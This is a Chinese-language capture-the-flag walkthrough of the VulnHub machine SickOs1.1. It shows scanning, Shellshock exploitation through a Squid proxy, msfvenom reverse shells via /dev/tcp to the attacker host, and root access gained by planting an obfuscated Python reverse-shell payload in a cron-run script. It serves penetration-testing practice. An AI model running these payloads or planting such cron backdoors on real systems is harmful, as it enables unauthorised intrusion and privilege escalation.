vulnhub - SickOs1.1(解法二)
1 靶场详情
靶场名字:vulnhub - SickOs1.1
下载链接:https://download.vulnhub.com/sickos/sick0s1.1.7z详情回顾:
在上一次的攻击中,我们使用nmap扫描出了22\3128\8080三个端口,其中,8080显示为close,而3128是代理服务器,第一种解法即是通过代理服务器打开的突破口进行
2 目标扫描
2.1 目标发现
由于两次攻击目标间隔时间过长,靶场关机可能导致DHCP重新分配了IP地址
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.0.0/24
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-25 21:55 EST
Nmap scan report for 192.168.0.1
Host is up (0.00093s latency).
MAC Address: F4:2A:7D:52:0E:DA (Tp-link Technologies)
Nmap scan report for 192.168.0.102
Host is up (0.000087s latency).
MAC Address: 00:0C:29:84:01:A5 (VMware)
Nmap scan report for 192.168.0.200
Host is up (0.000076s latency).
MAC Address: F0:2F:74:2E:D9:B3 (Asustek Computer) # 实体机
Nmap scan report for 192.168.0.107
Host is up. # kali
Nmap done: 256 IP addresses (7 hosts up) scanned in 2.17 seconds锁定目标主机为192.168.0.102
2.2 扫描主机信息
基于第一次的渗透,这次我们换一个扫描器直接挂代理再进行一次扫描
┌──(kali㉿kali)-[~]
└─$ sudo nikto -h 192.168.0.102 -useproxy 192.168.0.102:3128
# nikto -h 主机IP -useproxy 代理服务器IP
[sudo] password for kali:
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.0.102
+ Target Hostname: 192.168.0.102
+ Target Port: 80
+ Proxy: 192.168.0.102:3128
+ Start Time: 2023-02-25 22:17:40 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128
+ Uncommon header 'x-cache' found, with contents: MISS from localhost
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Fri Dec 4 19:35:02 2015
+ Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place
+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Uncommon header '93e4r0-cve-2014-6271' found, with contents: true
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ 8726 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2023-02-25 22:18:11 (GMT-5) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested扫描出了OSVDB-112004: /cgi-bin/status漏洞,shellshock是一个非常著名的bash漏洞,又被称为bash之门,在老版本的Linux机器(4.1)上,此漏洞非常有用
shellshock简介:https://baike.baidu.com/item/Shellshock/15862860?fr=aladdin3 攻击尝试
3.1 验证shellshock漏洞
使用curl命令对shellshock进行验证
┌──(kali㉿kali)-[~]
└─$ sudo curl -v --proxy http://192.168.0.102:3128 http://192.168.0.102/cgi-bin/status -H "Referer:() { test;}; echo 'Content-Type: test/plain'; echo; echo; /usr/bin/id;exit"
# 命令解释 curl -v 显示详细信息 --proxy 代理服务器 -H 设置主机头
* Trying 192.168.0.102:3128...
* Connected to 192.168.0.102 (192.168.0.102) port 3128 (#0)
> GET http://192.168.0.102/cgi-bin/status HTTP/1.1
> Host: 192.168.0.102
> User-Agent: curl/7.85.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> Referer:() { test;}; echo 'Content-Type: test/plain'; echo; echo; /usr/bin/id;exit
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Date: Tue, 28 Feb 2023 07:00:08 GMT
< Server: Apache/2.2.22 (Ubuntu)
< Content-Type: test/plain
< X-Cache: MISS from localhost
< X-Cache-Lookup: MISS from localhost:3128
< Via: 1.0 localhost (squid/3.1.19)
< Connection: close
<
uid=33(www-data) gid=33(www-data) groups=33(www-data) # 验证输出 说明漏洞存在
* Closing connection 0
3.2 构造反弹shell
我们通过msfvenom构建一个反弹shell
┌──(kali㉿kali)-[~]
└─$ sudo msfvenom -p cmd/unix/reverse_bash lhost=192.168.0.107 lport=443 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 76 bytes
bash -c '0<&147-;exec 147<>/dev/tcp/192.168.0.107/443;sh <&147 >&147 2>&147'3.3 尝试反弹shell
监听443端口
┌──(kali㉿kali)-[~]
└─$ nc -lvp 443
listening on [any] 443 ...尝试攻击
┌──(kali㉿kali)-[~]
└─$ sudo curl -v --proxy http://192.168.0.102:3128 http://192.168.0.102/cgi-bin/status -H "Referer:() { test;}; 0<&147-;exec 147<>/dev/tcp/192.168.0.107/443;sh <&147 >&147 2>&147"
* Trying 192.168.0.102:3128...
* Connected to 192.168.0.102 (192.168.0.102) port 3128 (#0)
> GET http://192.168.0.102/cgi-bin/status HTTP/1.1
> Host: 192.168.0.102
> User-Agent: curl/7.85.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> Referer:() { test;}; 0<&147-;exec 147<>/dev/tcp/192.168.0.107/443;sh <&147 >&147 2>&147
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 500 Internal Server Error
< Date: Tue, 28 Feb 2023 07:10:48 GMT
< Server: Apache/2.2.22 (Ubuntu)
< Vary: Accept-Encoding
< Content-Length: 618
< Content-Type: text/html; charset=iso-8859-1
< X-Cache: MISS from localhost
< X-Cache-Lookup: MISS from localhost:3128
< Via: 1.0 localhost (squid/3.1.19)
* HTTP/1.0 connection set to keep alive
< Connection: keep-alive
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
webmaster@localhost and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
<hr>
<address>Apache/2.2.22 (Ubuntu) Server at 192.168.0.102 Port 80</address>
</body></html>
* Connection #0 to host 192.168.0.102 left intact运行载荷后,发现443端口有反应但很快被断掉
┌──(kali㉿kali)-[~]
└─$ nc -lvp 443
listening on [any] 443 ...
192.168.0.102: inverse host lookup failed: Unknown host
connect to [192.168.0.107] from (UNKNOWN) [192.168.0.102] 35722
/bin/bash: sh: No such file or directory报错是/bin/bash: sh: No such file or directory,原因可能出现在0<&147-;exec 147<>/dev/tcp/192.168.0.107/443;sh中的sh没有指定路径
重新监听nv -lvp 443
┌──(kali㉿kali)-[~]
└─$ sudo curl -v --proxy http://192.168.0.102:3128 http://192.168.0.102/cgi-bin/status -H "Referer:() { test;}; 0<&147-;exec 147<>/dev/tcp/192.168.0.107/443;/bin/sh <&147 >&147 2>&147"
[sudo] password for kali:
* Trying 192.168.0.102:3128...
* Connected to 192.168.0.102 (192.168.0.102) port 3128 (#0)
> GET http://192.168.0.102/cgi-bin/status HTTP/1.1
> Host: 192.168.0.102
> User-Agent: curl/7.85.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> Referer:() { test;}; 0<&147-;exec 147<>/dev/tcp/192.168.0.107/443;/bin/sh <&147 >&147 2>&147
> 
这边成功获取了反弹shell
3.4 获取主机信息
┌──(kali㉿kali)-[~]
└─$ nc -lvp 443
listening on [any] 443 ...
192.168.0.102: inverse host lookup failed: Unknown host
connect to [192.168.0.107] from (UNKNOWN) [192.168.0.102] 35724
ls
status
pwd # 查看当前路径
/usr/lib/cgi-bin
whoami # 当前用户
www-data uname -a # 当前系统信息
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 athlon i386 GNU/Linux
dpkg -l # 查看系统装了哪些软件
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name Version Description
+++-================================-=================================-==========================================================================
ii libx11-data 2:1.4.99.1-0ubuntu2.2 X11 client-side library
ii libxapian22 1.2.8-1 Search engine library
ii python 2.7.3-0ubuntu2.2 interactive high-level object-oriented language (default version)
ii python-apport 2.0.1-0ubuntu17.6 apport crash report handling library
ii python-apt 0.8.3ubuntu7.2 Python interface to libapt-pkg
ii python-apt-common 0.8.3ubuntu7.2 Python interface to libapt-pkg (locales)
ii python-chardet 2.0.1-2build1 universal character encoding detector
ii python-crypto 2.4.1-1ubuntu0.1 cryptographic algorithms and protocols for Python
ii xz-lzma 5.1.1alpha+20110809-3 XZ-format compression utilities - compatibility commands
ii xz-utils 5.1.1alpha+20110809-3 XZ-format compression utilities
ii zlib1g 1:1.2.3.4.dfsg-3ubuntu4 compression library - runtime
....由于软件太多,所以省略部分3.5 python获取半交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
# 获得shell
www-data@SickOs:/usr/lib/cgi-bin$ 4 提权
之前尝试过猜用户密码进行提权,这次尝试采取定时任务提权
4.1 查找定时任务
通常定时任务放置于/etc目录下以cron*开头的文件
最常见的两个定时任务文件:
cat /etc/crontab
cat /etc/cron.d在/etc下找到了cron.d,但他是个文件夹
www-data@SickOs:/etc$ ls -liah | grep cron
ls -liah | grep cron
131439 drwxr-xr-x 2 root root 4.0K Dec 5 2015 cron.d
131120 drwxr-xr-x 2 root root 4.0K Sep 22 2015 cron.daily
131443 drwxr-xr-x 2 root root 4.0K Sep 22 2015 cron.hourly
131431 drwxr-xr-x 2 root root 4.0K Sep 22 2015 cron.monthly
131433 drwxr-xr-x 2 root root 4.0K Sep 22 2015 cron.weekly
131437 -rw-r--r-- 1 root root 722 Jun 20 2012 crontab
# 首先查看crontab
www-data@SickOs:/etc$ cat crontab
cat crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
## test -x 是查看是否已经在执行执行文件 run-parts便利目标文件夹
# crontab可用价值不高,cron.d是个文件夹,一点点翻找
www-data@SickOs:/etc$ cd cron.d
cd cron.d
www-data@SickOs:/etc/cron.d$ ls
ls
automate php5
# 找到一个定时任务
www-data@SickOs:/etc/cron.d$ cat automate
cat automate
* * * * * root /usr/bin/python /var/www/connect.py 定时任务显示:每分钟root账号使用python运行/var/www/connect.py一次,/var/www/connect.py应该存在于web目录下,大概率是当前用户www-data的权限内
检查一下 文件可控
www-data@SickOs:/var/www$ ls
ls
connect.py index.php robots.txt wolfcms
www-data@SickOs:/var/www$ vi connect.py
vi connect.py
#!/usr/bin/python
print "I Try to connect things very frequently\n"
print "You may want to try my services"
4.2 构建python反弹shell
┌──(kali㉿kali)-[~]
└─$ sudo msfvenom -p cmd/unix/reverse_python Lhost=192.168.0.107 lport=444 -f raw
[sudo] password for kali:
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 364 bytes
python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqNkM0KgzAQhF9FckpAtkakP5QcpFgopS1U76JpilKbBFffv0hsC3pxL8ssHzPD1m9r2s5DI1+q871hsC9ta6RCdNqg9529W5XBThC+C4GvtxAADzZkygy2Ioqi6R2FywK36KjiY366JtnYwN3S2+Gcp9k9iS9sZgPSaK1kR+nQxv9lshlqEB69DSnCs26UNpQ5OlhM8sVkOCOt+P8TZNE0lKzKWq/KAivCPrmeXxQ=')[0])))"4.3 将payload放入connect.py文件
半交互shell会出现很多稀奇古怪的乱码,不用太多纠结
www-data@SickOs:/var/www$ vi connect.py
vi connect.py
oexec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqNkM0KgzAQhF9FckpAtkakP5QcpFgopS1U76JpilKbBFexec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('co
decs').getencoder('utf-8')('eNqNkM0KgzAQhF9FckpAtkakP5QcpFgopS1U76JpilKbBFffv0hs
C3pxL8ssHzPD1m9r2s5DI1+q871hsC9ta6RCdNqg9529W5XBThC+C4GvtxAADzZkygy2Ioqi6R2FywK3
6KjiY366JtnYwN3S2+Gcp9k9iS9sZgPSaK1kR+nQxv9lshlqEB69DSnCs26UNpQ5OlhM8sVkOCOt+P8T
ZNE0lKzKWq/KAivCPrmeXxQ=')[0])))
ffv0hsC3pxL8ssHzPD1m9r2s5DI1+q871hsC9ta6RCdNqg9529W5XBThC+C4GvtxAADzZkygy2Ioqi6R2FywK36KjiY366JtnYwN3S2+Gcp9k9iS9sZgPSaK1kR+nQxv9lshlqEB69DSnCs26UNpQ5OlhM8sVkOCOt+P8TZNE0lKzKWq/KAivCPrmeXxQ=')[0])))^[:wq"
print "You may want to try my services"
~ 直接进入文件,点击o新起一行,粘贴完成后,直接esc然后:wq保存,保存结束后再检查是否放入成功
www-data@SickOs:/var/www$ cat connect.py
cat connect.py
#!/usr/bin/python
exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqNkM0KgzAQhF9FckpAtkakP5QcpFgopS1U76JpilKbBFffv0hsC3pxL8ssHzPD1m9r2s5DI1+q871hsC9ta6RCdNqg9529W5XBThC+C4GvtxAADzZkygy2Ioqi6R2FywK36KjiY366JtnYwN3S2+Gcp9k9iS9sZgPSaK1kR+nQxv9lshlqEB69DSnCs26UNpQ5OlhM8sVkOCOt+P8TZNE0lKzKWq/KAivCPrmeXxQ=')[0])))
print "I Try to connect things very frequently\n"
print "You may want to try my services"4.4 获取shell
kali监听nc -lvp 444端口,发现已经反弹回来了
┌──(kali㉿kali)-[~]
└─$ nc -lvp 444
listening on [any] 444 ...
192.168.0.102: inverse host lookup failed: Unknown host
connect to [192.168.0.107] from (UNKNOWN) [192.168.0.102] 49611
ls
a0216ea4d51874464078c618298b1367.txt
whoami
root4.5 获取交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
root@SickOs:~# ls
ls
a0216ea4d51874464078c618298b1367.txt
root@SickOs:~# cat a0216ea4d51874464078c618298b1367.txt
cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!
ROOT!
You have Succesfully completed SickOS1.1.
Thanks for Tryingvulnhub - SickOs1.1(解法二)
http://localhost:8080/archives/ba-chang-shi-lian-vulnhub-004_sickos1.1-jie-fa-er